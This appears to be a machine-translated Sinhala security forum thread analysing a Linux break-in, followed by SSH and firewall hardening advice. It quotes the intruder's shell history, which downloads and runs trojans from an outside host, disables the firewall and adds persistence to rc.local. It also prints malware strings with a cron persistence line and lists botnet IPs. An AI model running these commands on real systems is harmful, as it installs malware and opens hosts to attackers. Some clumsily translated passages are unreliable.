මම හැක් කළාද?

මම පාරිභෝගික නිෂ්පාදනයක් සංවර්ධනය කරමින් සිටින අතර, එය අන්තර්ජාලයට සම්බන්ධ කළ යුතු යැයි අපේක්ෂා කරන අතර, අපේක්ෂා කළ පරිදි එය නිසි ලෙස සංවර්ධනය කිරීමට හැකි වන පරිදි එය අන්තර්ජාලයට සම්බන්ධ වේ.

මම පැයක් හෝ දෙකක් ගිය අතර, මම නැවත මගේ කාර්යාලයට පැමිණෙන විට පර්යන්තයේ ලියා ඇති අමුතු විධාන කිහිපයක් දුටුවෙමි.

නමින් හැඳින්වෙන ලිනක්ස් ලොග් ගොනුව දෙස බැලීමෙන් auth.logමට පහත පේළි දැකිය හැකිය (තවත් බොහෝ දේ අතර):

Feb  1 10:45:10 debian-armhf sshd[994]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=40.127.205.162  user=root
Feb  1 10:45:12 debian-armhf sshd[994]: Failed password for root from 40.127.205.162 port 37198 ssh2
Feb  1 10:45:12 debian-armhf sshd[994]: Received disconnect from 40.127.205.162: 11: Bye Bye [preauth]

IP ලිපිනය 40.127.205.162කිරීමට හැරෙනවා මයික්රොසොෆ්ට් අයත් .

මා away තින් සිටියදී භාවිතා කළ විධාන පොකුරක් මෙන්න:

  355  service iptables stop
  356  cd /tmp
  357  wget http://222.186.30.209:65534/yjz1
  358  chmod 0755 /tmp/yjz1
  359  nohup /tmp/yjz1 > /dev/null 2>&1 &
  360  chmod 777 yjz1
  361  ./yjz1
  362  chmod 0755 /tmp/yjz1
  363  nohup /tmp/yjz1 > /dev/null 2>&1 &
  364  chmod 0777 yjz1
  365  chmod u+x yjz1
  366  ./yjz1 &
  367  chmod u+x yjz1
  368  ./yjz1 &
  369  wget http://222.186.30.209:65534/yjz
  370  chmod 0755 /tmp/yjz
  371  nohup /tmp/yjz > /dev/null 2>&1 &
  372  chmod 777 yjz
  373  ./yjz
  374  chmod 0755 /tmp/yjz
  375  nohup /tmp/yjz > /dev/null 2>&1 &
  376  chmod u+x yjz
  377  ./yjz &
  378  chmod u+x yjz
  379  ./yjz &
  380  cd /tmp
  381  echo "cd  /tmp/">>/etc/rc.local
  382  service iptables stop
  383  cd /tmp
  384  wget http://222.186.30.209:65534/yjz1
  385  chmod 0755 /tmp/yjz1
  386  nohup /tmp/yjz1 > /dev/null 2>&1 &
  387  chmod 777 yjz1
  388  ./yjz1
  389  chmod 0755 /tmp/yjz1
  390  nohup /tmp/yjz1 > /dev/null 2>&1 &
  391  chmod u+x yjz1
  392  ./yjz1 &
  393  chmod 0777 yjz1
  394  ./yjz1 &
  395  echo "cd  /tmp/">>/etc/rc.local
  396  service iptables stop
  397  wget http://222.186.30.209:65534/yjz1
  398  chmod 0755 /root/yjz1
  399  nohup /root/yjz1 > /dev/null 2>&1 &
  400  chmod 777 yjz1
  401  ./yjz1
  402  chmod 0755 /root/yjz1
  403  nohup /root/yjz1 > /dev/null 2>&1 &
  404  chmod u+x yjz1
  405  ./yjz1 &
  406  chmod 0777 yjz1
  407  ./yjz1 &
  408  echo "cd  /root/">>/etc/rc.local
  409  cd /tmp
  410  service iptables stop
  411  wget http://222.186.30.209:65534/yjz1
  412  chmod 0755 /tmp/yjz1
  413  nohup /tmp/yjz1 > /dev/null 2>&1 &
  414  chmod 777 yjz1
  415  ./yjz1 &
  416  cd /etc
  417  echo "cd /root/">>/etc/rc.local
  418  echo "./yjz1&">>/etc/rc.local
  419  echo "./yjz1&">>/etc/rc.local
  420  echo "/etc/init.d/iptables stop">>/etc/rc.local
  421  cd /tmp
  422  service iptables stop
  423  wget http://222.186.30.209:65534/yjz1
  424  chmod 0755 /tmp/yjz1
  425  nohup /tmp/yjz1 > /dev/null 2>&1 &
  426  chmod 777 yjz1
  427  ./yjz1 &
  428  cd /etc
  429  echo "cd /root/">>/etc/rc.local
  430  echo "./yjz1&">>/etc/rc.local
  431  echo "./yjz1&">>/etc/rc.local
  432  echo "/etc/init.d/iptables stop">>/etc/rc.local
  433  cd /tmp
  434  service iptables stop
  435  wget http://222.186.30.209:65534/yjz1
  436  chmod 0755 /tmp/yjz1
  437  nohup /tmp/yjz1 > /dev/null 2>&1 &
  438  chmod 777 yjz1
  439  ./yjz1 &
  440  cd /etc
  441  echo "cd /root/">>/etc/rc.local
  442  echo "./yjz1&">>/etc/rc.local
  443  echo "./yjz1&">>/etc/rc.local
  444  echo "/etc/init.d/iptables stop">>/etc/rc.local
  445  service iptables stop
  446  wget http://222.186.30.209:65534/yjz1
  447  chmod 0755 /root/yjz1
  448  nohup /root/yjz1 > /dev/null 2>&1 &
  449  chmod 777 yjz1
  450  ./yjz1
  451  chmod 0755 /root/yjz1
  452  nohup /root/yjz1 > /dev/null 2>&1 &
  453  chmod 0777 yjz1
  454  chmod u+x yjz1
  455  ./yjz1 &
  456  chmod u+x yjz1
  457  ./yjz1 &

සහ තවත්:

  481  service iptables stop
  482  wget http://222.186.30.209:65534/yjz1
  483  chmod 0755 /root/yjz1
  484  nohup /root/yjz1 > /dev/null 2>&1 &
  485  chmod 777 yjz1
  486  ./yjz1
  487  chmod 0755 /root/yjz1
  488  nohup /root/yjz1 > /dev/null 2>&1 &
  489  chmod 0777 yjz1
  490  chmod u+x yjz1
  491  ./yjz1 &
  492  chmod u+x yjz1
  493  ./yjz1 &
  494  cd /tmp
  495  service iptables stop
  496  wget http://175.102.133.55:2/yjz
  497  ./yd_cd/make
  498  service iptables stop
  499  service iptables stop
  500  wget http://222.186.30.209:65534/yjz1

මම මේ ගැන සම්පූර්ණයෙන්ම දැන සිටියේ නැත. මගේ නිෂ්පාදනය නිසි ලෙස සුරක්ෂිත කරන්නේ කෙසේද?

සම්පූර්ණ auth.logගොනුව පළ කිරීමට මම කැමතියි . මම කොහොමද ඒක කරන්නේ?

එසේම, yjz1බාගත කරන ලද ගොනුව ලිනක්ස් ට්‍රෝජන් ලෙස පෙනෙන අතර මේ සියල්ල http://anti-hacker-alliance.com/index.php?ip=40.127.205.162 අනුව යම් ආකාරයක හැකර් කණ්ඩායමක් විසින් සිදු කර ඇති බව පෙනේ.

මම මයික්‍රොසොෆ්ට් අමතා ඔවුන් සමඟ කතා කළ යුතුද? මම කළ යුත්තේ කුමක් ද?

සංස්කරණය 2 :

මෙම සටහන මෙතරම් අවධානයක් දිනා ගැනීමට එක් හොඳ හේතුවක් තිබේ: ඔබේ පරිගණකයේ අනවසරයෙන් ඇතුල්වන්නෙකුගේ සම්පූර්ණ සජීවී සැසිය පටිගත කිරීමට ඔබට හැකි විය. මෙය අපගේ එදිනෙදා අත්දැකීම් වලට වඩා බෙහෙවින් වෙනස් ය, එහිදී අපි ඔහුගේ ක්‍රියාවන්ගේ ප්‍රතිවිපාක සොයා ගැනීම සමඟ කටයුතු කර ඒවා විසඳීමට උත්සාහ කරමු. මෙන්න අපි ඔහු වැඩ කරන ස්ථානයේදී දකිමු, ඔහුට පසුපස දොරටුව පිහිටුවීම, ඔහුගේ පියවර නැවත ලබා ගැනීම, උමතුවෙන් වැඩ කිරීම (සමහර විට ඔහු ඔබේ මේසය මත හිඳගෙන සිටීම, ඉහත යෝජනා කළ පරිදි හෝ සමහර විට, සහ මගේ මතය අනුව බොහෝ විට ඔහු සිටි නිසා ඔහුගේ අනිෂ්ට මෘදුකාංග පද්ධතිය තුළ ක්‍රියාත්මක කිරීමට නොහැකි වීම, පහත කියවන්න), සහ ස්වයංක්‍රීයව පාලනය කළ හැකි උපකරණ යෙදවීමට උත්සාහ කරන්න. ආරක්ෂක පර්යේෂකයන් ඔවුන්ගේ පැණි උගුල් සමඟ දිනපතා සාක්ෂි දරන්නේ මෙයයි . මට නම් මෙය ඉතා දුර්ලභ අවස්ථාවක් වන අතර යම් විනෝදයක මූලාශ්‍රය වේ.

ඔබ අනිවාර්යයෙන්ම කපා කොටා ඇත. මේ සඳහා සාක්ෂි ඔබ ප්‍රදර්ශනය කළ ගොනුවේ කුඩා කොටසෙන් ලැබෙන්නේ නැතauth.log , මන්ද මෙය අසාර්ථක පිවිසුම් උත්සාහයක් වාර්තා කරන අතර එය කෙටි කාලයක් තුළ (තත්පර දෙකක්) සිදු වේ. දෙවන පේළියේ සඳහන් වන බව ඔබට පෙනෙනු ඇති Failed passwordඅතර, තෙවනුව pre-authවිසන්ධි වූ බව වාර්තා කරයි : පුද්ගලයා උත්සාහ කර අසාර්ථක විය.

ඒ වෙනුවට සාක්ෂි ලැබෙන්නේ ලිපිගොනු දෙකේ අන්තර්ගතය http://222.186.30.209:65534/yjzසහ http://222.186.30.209:65534/yjz1ප්‍රහාරකයා ඔබේ පද්ධතියට බාගත කරමිනි.

වෙබ් අඩවිය දැනට ඕනෑම කෙනෙකුට ඒවා බාගත කිරීම සඳහා විවෘතව ඇත. මම මුලින්ම fileඔවුන් මතට දිව ගියෙමි .

$ file y*
yjz:      ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
yjz1:     ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

ඉන්පසු මම ඔවුන් සතුව ඇති බිට් 64 ඩෙබියන් වීඑම් එකක් වෙත ගෙන ආවෙමි. stringsවිධානය හරහා ඒවායේ අන්තර්ගතය පරීක්ෂා කිරීමෙන් සැක සහිත බොහෝ දේ අනාවරණය විය (විවිධ ප්‍රසිද්ධ ප්‍රහාරයන් ගැන සඳහන් කිරීම, ආදේශ කළ යුතු විධානයන්, නව සේවාවක් සැකසීමට පැහැදිලිව භාවිතා කළ පිටපතක් සහ යනාදිය).

මම පසුව ලිපිගොනු දෙකෙහිම MD5-hashes නිපදවා ඒවා අනිෂ්ට මෘදුකාංගවල දන්නා නියෝජිතයන් දැයි බැලීමට සිම්රූගේ හැෂ් දත්ත ගබඩාවට පෝෂණය කළෙමි . අතර yjz, නොවේ yjz1, සහ Cymru 58% ක ප්රති වෛරස් මෘදුකාංග විසින් ග්රහණය සම්භාවිතා වාර්තා කරයි. මෙම ගොනුව අවසන් වරට දැක ඇත්තේ දින තුනකට පමණ පෙර බව ද එහි සඳහන් වේ.

ධාවනය clamscan (කොටසක් clamavමම ලබා ගත් ගොනු දෙකක් මත ඇසුරුම්):

$ clamscan y*
yjz: Linux.Backdoor.Gates FOUND
yjz1: Linux.Trojan.Xorddos FOUND

එබැවින් සම්මත ලිනක්ස් මෘදුකාංගයට එය හඳුනාගත හැකි බව අපට දැන් විශ්වාසයි.

ඔබ කළ යුත්තේ කුමක්ද?

තරමක් අළුත් වුවත්, කිසිදු පද්ධතියක් ඉතා අළුත් නොවේ , උදාහරණයක් ලෙස XorDdos පිළිබඳ මෙම ජනවාරි 2015 ලිපිය බලන්න . එබැවින් බොහෝ නිදහස් පැකේජවලට එය ඉවත් කිරීමට හැකි විය යුතුය. ඔබ උත්සාහ කළ යුතුයි: clamav, rkhunter, chkrootkit. මම ගූගල් කර ඇති අතර, ඔවුන් එය හඳුනාගත හැකි යැයි කියා සිටින බව දුටුවෙමි. පූර්වගාමියාගේ වැඩ පරීක්ෂා කිරීමට ඒවා භාවිතා කරන්න, නමුත් මෙම වැඩසටහන් තුන ක්‍රියාත්මක කිරීමෙන් පසු ඔබ යාමට සූදානම් විය යුතුය.

විශාල ප්‍රශ්නය සම්බන්ධයෙන් ගත් කල what should you do to prevent future infections, ජර්මන්මන්ගේ පිළිතුර හොඳ පළමු පියවරකි. එය අඛණ්ඩ අරගලයක් බව මතක තබා ගන්න, අප සියල්ලන්ම (මා ද ඇතුළුව) එය නොදැනුවත්වම නැතිවී යන්නට ඇත.

සංස්කරණය කරන්න :

වික්ටර් ටොත්ගේ (වක්‍ර) විමසුමේදී මම අදහස් කිහිපයක් එක් කිරීමට කැමැත්තෙමි. අනවසරයෙන් ඇතුළුවන්නාට යම් යම් දුෂ්කරතා ඇති වූ බව නිසැක ය: ඔහු එකිනෙකට වෙනස් හැකින් මෙවලම් දෙකක් බාගත කරයි, ඒවායේ අවසරයන් කිහිප වතාවක් වෙනස් කරයි, කිහිප වතාවක් නැවත ආරම්භ කරයි, සහ ෆයර්වෝලය අක්‍රීය කිරීමට බොහෝ වාරයක් උත්සාහ කරයි. සිදුවන්නේ කුමක්දැයි අනුමාන කිරීම පහසුය: ඔහු තම අනවසරයෙන් පරිගණකයක් වෙත සන්නිවේදන නාලිකාවක් විවෘත කරනු ඇතැයි අපේක්ෂා කරයි (පසුව බලන්න), සහ, මෙම නව නාලිකාව ඔහුගේ පාලක GUI මතට නොපැමිණෙන විට, ඔහුගේ අනවසරයෙන් ඇතුළුවීමට බිය වේ ෆයර්වෝලය මඟින් මෙවලම අවහිර කරනු ලැබේ, එබැවින් ඔහු ස්ථාපන ක්‍රියාවලිය නැවත සිදු කරයි. වික්ටර් ටෝත් සමඟ මම එකඟ වෙමි, ඔහුගේ මෙහෙයුමේ මෙම සුවිශේෂී අවධිය අපේක්ෂිත fruits ල ගෙන එන බවක් නොපෙනේ, නමුත් මම ඔබව දැඩි ලෙස ධෛර්යමත් කිරීමට කැමැත්තෙමි ඔබේ පරිගණකයට සිදු වූ හානියේ තරම අවතක්සේරු කිරීම නොවේ.

මම මෙහි අර්ධ ප්‍රතිදානයක් ලබා දෙමි strings yjz1:

etc/init.d/%s
/etc/rc%d.d/S90%s
--del
chkconfig
remove
update-rc.d
/etc/cron.hourly/gcc4.sh
/etc/rc.d/rc%d.d/S90%s
--add
defaults
/proc/%d/exe
/proc/self/exe
HOME=/
MYSQL_HISTFILE=/dev/null
#!/bin/sh
# chkconfig: 12345 90 90
# description: %s
### BEGIN INIT INFO
# Provides:             %s
# Required-Start:
# Required-Stop:
# Default-Start:        1 2 3 4 5
# Default-Stop:
# Short-Description:    %s
### END INIT INFO
case $1 in
start)
stop)
esac
sed -i '/\/etc\/cron.hourly\/gcc4.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc4.sh' >> /etc/crontab
etc/init.d/%s
GET %s HTTP/1.1
%sHost: %s
POST %s HTTP/1.1
%sHost: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
%s%s
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1;      TencentTraveler ; .NET CLR 1.1.4322)
Connection: Keep-Alive

මෙම සේවා (සමග පළුදු සාක්ෂි සපයයි /etc/init.dසහ /etc/rc.dසමග,) crontabඉතිහාසය ගොනු සමග, mysqlසහ ගොනු කිහිපයක් procසබැඳි වන bash(ඔබේ ෂෙල් අභිරුචි-කළ වංචනික අනුවාදය රෝපණය කර ඇත යෝජනා). එවිට වැඩසටහන HTTP ඉල්ලීමක් ජනනය කරයි (චීන කතා කරන වෙබ් අඩවියකට,

 Accept-Language: zh-cn

එය ඉහත ඩේවිඩ් ෂ්වාට්ස්ගේ ප්‍රකාශයට සාරය සපයයි), එය ඊටත් වඩා විනාශයක් ඇති කළ හැකිය. ඉල්ලීම පරිදි, ද්විමය ( Content-Type: application/x-www-form-urlencoded) ප්‍රහාරක පරිගණකයට (GET) බාගත කර පාලක යන්ත්‍රයට (POST) උඩුගත කළ යුතුය. පහර දුන් පරිගණකයට බාගත කළ හැකි දේ මට ස්ථාපිත කිරීමට නොහැකි විය, නමුත්, දෙකෙහිම කුඩා ප්‍රමාණය yjzසහ yjz1(1.1MB සහ 600kB, අනුමාන වශයෙන්), රූට්කිට් සළුව සඳහා අවශ්‍ය බොහෝ ලිපිගොනු, එනම් වෙනස් කළ බව අනුමාන කිරීමට මට හැකිය. වන සංස්කරණය ls, netstat, ps, ifconfig, ..., මේ ආකාරයට බාගත කර ගත වනු ඇත. මෙම බාගත කිරීම ලබා ගැනීමට ප්‍රහාරකයාගේ දැඩි උත්සාහයන් මෙයින් පැහැදිලි වේ.

ඉහත සඳහන් සියලු හැකියාවන් අවසන් වන බවට නිශ්චිතභාවයක් නොමැත: අපට නිසැකවම පිටපතෙහි කොටසක් නොමැත (457 සහ 481 පේළි අතර) සහ අපට පිටවීමක් නොපෙනේ; 495-497 පේළි, විශේෂයෙන් කනස්සල්ලට කරුණකි.

cd /tmp;  ./yd_cd/make

එය අප බාගත කර නොතිබූ ගොනුවකට යොමු වන අතර එය සම්පාදනය විය හැකිය: එසේ නම්, එයින් අදහස් වන්නේ ප්‍රහාරකයාට (අවසානයේ?) ඔහුගේ ක්‍රියාත්මක කළ හැකි ගැටළුව කුමක්දැයි වටහාගෙන ඇති අතර එය නිවැරදි කිරීමට උත්සාහ කරයි. පහර දුන් පරිගණකය හොඳට ගිහින්. [ඇත්ත වශයෙන්ම, ප්‍රහාරකයා විසින් හැක් කරන ලද යන්ත්‍රයට බාගත කළ අනිෂ්ට මෘදුකාංගයේ අනුවාද දෙක (සහ මම මගේ 64bit ඩෙබියන් වීඑම් වෙත) නුසුදුසු ගෘහ නිර්මාණ ශිල්පයක් සඳහා වන x86 වන අතර, අනවසරයෙන් පිටවන ලද පරිගණකයේ නම පමණක් ලබා දෙයි. ඔහු හස්ත ගෘහ නිර්මාණ ශිල්පය සමඟ කටයුතු කරමින් සිටියේය].

මා මෙම සංස්කරණය ලිවීමට හේතුව ඔබේ පද්ධතිය වෘත්තීය මෙවලමක් සමඟ ඒකාබද්ධ කිරීමට හෝ මුල සිටම නැවත ස්ථාපනය කිරීමට හැකි තරම් දැඩි ලෙස ඔබෙන් ඉල්ලා සිටීමයි.

තවද, මෙය ඕනෑම කෙනෙකුට ප්‍රයෝජනවත් යැයි ඔප්පු වුවහොත්, සම්බන්ධ වීමට උත්සාහ කරන IP ලිපින 331 ලැයිස්තුව මෙයයි yjz. මෙම ලැයිස්තුව ඉතා විශාලය (හා බොහෝ විට තවමත් විශාල වීමට නියම කර ඇත) මෙය අවුල් කිරීමට හේතුව මෙය යැයි මම විශ්වාස කරමි mysql. අනෙක් පසුබිම විසින් සපයන ලද ලැයිස්තුව එක හා සමාන වන අතර, එවැනි වැදගත් තොරතුරක් එළිමහනේ තැබීමට හේතුව එය යැයි මම සිතමි (මම හිතන්නේ ප්‍රහාරකයා ඒවා කර්නල් ආකෘතියෙන් ගබඩා කිරීමට උත්සාහ කිරීමට අකමැති විය, එබැවින් ඔහු මුළු ලැයිස්තුවම පැහැදිලි-පෙළ ගොනුවක තැබුවේය, එය ඔහුගේ සියලු පසුපස දොරවල් කියවිය හැකි ඕනෑම මෙහෙයුම් පද්ධතියක් සඳහා විය හැකිය):

61.132.163.68
202.102.192.68
202.102.213.68
202.102.200.101
58.242.2.2
202.38.64.1
211.91.88.129
211.138.180.2
218.104.78.2
202.102.199.68
202.175.3.3
202.175.3.8
202.112.144.30
61.233.9.9
61.233.9.61
124.207.160.110
202.97.7.6
202.97.7.17
202.106.0.20
202.106.46.151
202.106.195.68
202.106.196.115
202.106.196.212
202.106.196.228
202.106.196.230
202.106.196.232
202.106.196.237
202.112.112.10
211.136.17.107
211.136.28.231
211.136.28.234
211.136.28.237
211.147.6.3
219.141.136.10
219.141.140.10
219.141.148.37
219.141.148.39
219.239.26.42
221.130.32.100
221.130.32.103
221.130.32.106
221.130.32.109
221.130.33.52
221.130.33.60
221.176.3.70
221.176.3.73
221.176.3.76
221.176.3.79
221.176.3.83
221.176.3.85
221.176.4.6
221.176.4.9
221.176.4.12
221.176.4.15
221.176.4.18
221.176.4.21
58.22.96.66
218.104.128.106
202.101.98.55
211.138.145.194
211.138.151.161
211.138.156.66
218.85.152.99
218.85.157.99
222.47.29.93
202.101.107.85
119.233.255.228
222.47.62.142
122.72.33.240
211.98.121.27
218.203.160.194
221.7.34.10
61.235.70.98
113.111.211.22
202.96.128.68
202.96.128.86
202.96.128.166
210.21.3.140
210.21.4.130
211.95.193.97
211.98.2.4
211.98.4.1
211.162.61.225
211.162.61.235
211.162.61.255
211.162.62.1
211.162.62.60
221.4.66.66
202.103.176.22
202.96.144.47
210.38.192.33
202.96.134.33
202.96.134.133
202.96.154.15
210.21.196.6
221.5.88.88
202.103.243.112
202.193.64.33
61.235.164.13
61.235.164.18
202.103.225.68
221.7.136.68
202.103.224.68
211.97.64.129
211.138.240.100
211.138.242.18
211.138.245.180
221.7.128.68
222.52.118.162
202.98.192.67
202.98.198.167
211.92.136.81
211.139.1.3
211.139.2.18
202.100.192.68
211.97.96.65
211.138.164.6
221.11.132.2
202.100.199.8
202.99.160.68
202.99.166.4
202.99.168.8
222.222.222.222
202.102.224.68
202.102.227.68
222.85.85.85
222.88.88.88
210.42.241.1
202.196.64.1
112.100.100.100
202.97.224.68
219.235.127.1
61.236.93.33
211.93.24.129
211.137.241.34
219.147.198.230
202.103.0.68
202.103.0.117
202.103.24.68
202.103.44.150
202.114.0.242
202.114.240.6
211.161.158.11
211.161.159.3
218.104.111.114
218.104.111.122
218.106.127.114
218.106.127.122
221.232.129.30
59.51.78.210
61.234.254.5
202.103.96.112
219.72.225.253
222.243.129.81
222.246.129.80
211.142.210.98
211.142.210.100
220.168.208.3
220.168.208.6
220.170.64.68
218.76.192.100
61.187.98.3
61.187.98.6
202.98.0.68
211.93.64.129
211.141.16.99
202.98.5.68
219.149.194.55
211.138.200.69
202.102.3.141
202.102.3.144
58.240.57.33
112.4.0.55
114.114.114.114
114.114.115.115
202.102.24.34
218.2.135.1
221.6.4.66
221.131.143.69
202.102.8.141
222.45.0.110
61.177.7.1
218.104.32.106
211.103.13.101
221.228.255.1
61.147.37.1
222.45.1.40
58.241.208.46
202.102.9.141
202.102.7.90
202.101.224.68
202.101.226.68
211.141.90.68
211.137.32.178
202.96.69.38
211.140.197.58
219.149.6.99
202.96.86.18
101.47.189.10
101.47.189.18
118.29.249.50
118.29.249.54
202.96.64.68
202.96.75.68
202.118.1.29
202.118.1.53
219.148.204.66
202.99.224.8
202.99.224.67
211.90.72.65
211.138.91.1
218.203.101.3
202.100.96.68
211.93.0.81
222.75.152.129
211.138.75.123
202.102.154.3
202.102.152.3
219.146.1.66
219.147.1.66
202.102.128.68
202.102.134.68
211.138.106.19
211.90.80.65
202.99.192.66
202.99.192.68
61.134.1.4
202.117.96.5
202.117.96.10
218.30.19.40
218.30.19.50
116.228.111.118
180.168.255.18
202.96.209.5
202.96.209.133
202.101.6.2
211.95.1.97
211.95.72.1
211.136.112.50
211.136.150.66
119.6.6.6
124.161.97.234
124.161.97.238
124.161.97.242
61.139.2.69
202.98.96.68
202.115.32.36
202.115.32.39
218.6.200.139
218.89.0.124
61.139.54.66
61.139.39.73
139.175.10.20
139.175.55.244
139.175.150.20
139.175.252.16
168.95.1.1
210.200.211.193
210.200.211.225
211.78.130.1
61.31.1.1
61.31.233.1
168.95.192.1
168.95.192.174
61.60.224.3
61.60.224.5
202.113.16.10
202.113.16.11
202.99.96.68
202.99.104.68
211.137.160.5
211.137.160.185
219.150.32.132
202.98.224.68
211.139.73.34
61.10.0.130
61.10.1.130
202.14.67.4
202.14.67.14
202.45.84.58
202.45.84.67
202.60.252.8
202.85.128.32
203.80.96.9
203.142.100.18
203.142.100.21
203.186.94.20
203.186.94.241
221.7.1.20
61.128.114.133
61.128.114.166
218.202.152.130
61.166.150.123
202.203.128.33
211.98.72.7
211.139.29.68
211.139.29.150
211.139.29.170
221.3.131.11
222.172.200.68
61.166.150.101
61.166.150.139
202.203.144.33
202.203.160.33
202.203.192.33
202.203.208.33
202.203.224.33
211.92.144.161
222.221.5.240
61.166.25.129
202.96.103.36
221.12.1.227
221.130.252.200
222.46.120.5
202.96.96.68
218.108.248.219
218.108.248.245
61.130.254.34
60.191.244.5
202.96.104.15
202.96.104.26
221.12.33.227
202.96.107.27
61.128.128.68
61.128.192.68
218.201.17.2
221.5.203.86
221.5.203.90
221.5.203.98
221.7.92.86
221.7.92.98

පහත කේතය

 #!/bin/bash
 echo 0 > out
 while read i; do
       whois $i | grep -m 1 -i country >> out
 done < filename
 cat out | grep -i cn | wc -l

ඉහත ලැයිස්තුවේ දැක්වෙන්නේ ලිපින 331 න් 302 ක්ම චීනයේ ප්‍රධාන භූමියේ ඇති අතර, ඉතිරි ලිපි හොංකොං, මොන්ගෝලියාව, තායිවානය යන රටවල ය. මෙය බොහෝ දුරට චීන බොට් මුද්දක් යැයි ඩේවිඩ් ෂ්වාට්ස්ගේ තර්කයට තවදුරටත් සහාය එක් කරයි.

සංස්කරණය 3

Aid vaid ගේ ඉල්ලීම පරිදි (OP හි කතුවරයා, ඔහුගේ අදහස පහතින් කියවන්න), මූලික ලිනක්ස් පද්ධතියක ආරක්ෂාව ශක්තිමත් කරන්නේ කෙසේද යන්න පිළිබඳව මම අදහසක් එක් කරමි (බොහෝ සේවාවන් සපයන පද්ධතියක් සඳහා මෙය වඩාත් සංකීර්ණ මාතෘකාවකි). vaidඔහු පහත සඳහන් දේ කරයි:

1. පද්ධතිය නැවත ස්ථාපනය කරන්න

2. මිශ්‍ර කුඩා හා ලොකු අකුරු සහ අක්ෂර සහ ඉලක්කම් සහිත මූල මුරපදය අක්ෂර 16 ක දිගු මුරපදයකට වෙනස් කරන ලදි.

3. පරිශීලක නාමය මිශ්‍ර අක්ෂර 6 කින් යුත් දිගු පරිශීලක නාමයකට වෙනස් කර root සඳහා භාවිතා කළ මුරපදයම යෙදුවේය

4. SSH වරාය 5000 ට වඩා වැඩි දෙයකට වෙනස් කර ඇත

5. SSH root පිවිසුම අක්‍රිය කර ඇත.

මෙය හොඳයි (බොහෝ ප්‍රයෝජනවත් වැඩසටහන් 10,000 ට අඩු වරායන් භාවිතා කරන බැවින් මම 10,000 ට වඩා වැඩි වරායක් භාවිතා කරනවා හැර). නමුත් මුරපද වෙනුවට ssh පිවිසුම සඳහා ගුප්ත ලේඛන යතුරු භාවිතා කිරීමේ අවශ්‍යතාවය මට අවධාරණය කළ නොහැක . මම ඔබට පෞද්ගලික උදාහරණයක් දෙන්නම්. මගේ එක් VPS එකක, ssh වරාය වෙනස් කළ යුතුදැයි මට අවිනිශ්චිත විය; මම එය 22 ට තැබුවෙමි, නමුත් සත්‍යාපනය සඳහා ක්‍රිප්ටෝ යතුරු භාවිතා කළෙමි. මට දිනකට කඩාවැටීමේ උත්සාහයන් සිය ගණනක් තිබුණද , කිසිවක් සාර්ථක වූයේ නැත. කිසිවෙකු සාර්ථක නොවූ බව දිනපතා පරීක්ෂා කිරීමට වෙහෙසට පත් වූ මම අවසානයේ වරාය 10,000 ට වඩා වැඩි දෙයකට මාරු කළෙමි. මතක තබා ගන්න, හැකර්වරු මෝඩයන් බව නොවේ (ඔවුන් එසේ නොවේ!), ඔවුන් පහසු ගොදුරක් දඩයම් කරයි.

අත්සන ඇල්ගොරිතමයක් ලෙස ආර්එස්ඒ සමඟ ක්‍රිප්ටෝ යතුරක් සක්‍රිය කිරීම පහසුය, ජෑන් හුඩෙක් විසින් පහත දැක්වෙන අදහස බලන්න (ස්තූතියි!):

 cd; mkdir .ssh; chmod 700 .ssh; cd .ssh; ssh-keygen -t rsa (then hit <kbd>ENTER>/kbd> three times); cat id_rsa.pub >> authorized_keys; chmod 600 *

දැන් ඔබ කළ යුතුව ඇත්තේ id_rsaඔබට සම්බන්ධ වීමට අවශ්‍ය යන්ත්‍රයට ගොනුව පිටපත් කිරීමයි (නාමාවලියක .ssh, chmod700 ට සංස්කරණය කරන්න), ඉන්පසු විධානය නිකුත් කරන්න

ssh -p YourChosenNonStandardPort -i ~/.ssh/id_rsa me@RemoteMachine

මෙය ක්‍රියාත්මක වන බව ඔබට විශ්වාස වූ විට, සේවාදායකයේ සංස්කරණය කරන්න (= ඔබට සම්බන්ධ වීමට අවශ්‍ය යන්ත්‍රය) ගොනුව /etc/ssh/sshd_configවෙනස් කර රේඛාව වෙනස් කරන්න

#PasswordAuthentication yes

වෙත

PasswordAuthentication no

sshසේවාව නැවත ආරම්භ කරන්න ( service ssh restartහෝ systemctl restart ssh, හෝ ඩිස්ට්‍රෝ මත පදනම්ව මේ වගේ දෙයක්).

මෙය බොහෝ දේට ඔරොත්තු දෙනු ඇත. ඇත්ත වශයෙන්ම, දැනට openssh v2භාවිතා කර ඇති RSA හි සහ RSA හි වර්තමාන අනුවාදයන්ට එරෙහිව දන්නා සූරාකෑම් නොමැත openssh v2.

අවසාන වශයෙන්, ඔබේ යන්ත්‍රය සැබවින්ම ක්‍රියා විරහිත කිරීම සඳහා, ඔබට පහත පරිදි ෆයර්වෝල් (නෙට්ෆිල්ටර් / අයිටේබල්) වින්‍යාස කිරීමට අවශ්‍ය වනු ඇත:

 iptables -A INPUT -p tcp --dport YourChosenNonStandardPort -j ACCEPT
 iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
 iptables -P INPUT DROP
 iptables -P OUTPUT ACCEPT
 iptables -A INPUT -i lo -j ACCEPT
 iptables -A OUTPUT -o lo -j ACCEPT

මෙය, 1) LAN සහ WAN යන දෙකින්ම ssh සම්බන්ධතා සඳහා ඉඩ ලබා දේ, 2) ඔබගේ ඉල්ලීම් අනුව ආරම්භ වූ සියලුම ආදානයන් සඳහා ඉඩ ලබා දේ (නිදසුනක් ලෙස, ඔබ වෙබ් පිටුවක් පූරණය කරන විට), 3) ආදාන මත අනෙක් සියල්ල පහත වැටේ, 4) සියල්ලට ඉඩ දෙයි ප්‍රතිදානය, සහ 5-6) ලූප්බැක් අතුරුමුහුණතේ ඇති සියල්ලට ඉඩ දෙයි.

ඔබගේ අවශ්‍යතා වර්ධනය වන විට සහ තවත් වරායන් විවෘත කිරීමට අවශ්‍ය වන විට, ලැයිස්තුවේ ඉහළින්ම ඇති නීති එකතු කිරීමෙන් ඔබට එය කළ හැකිය:

 iptables -A INPUT -p tcp --dport 80 -j ACCEPT

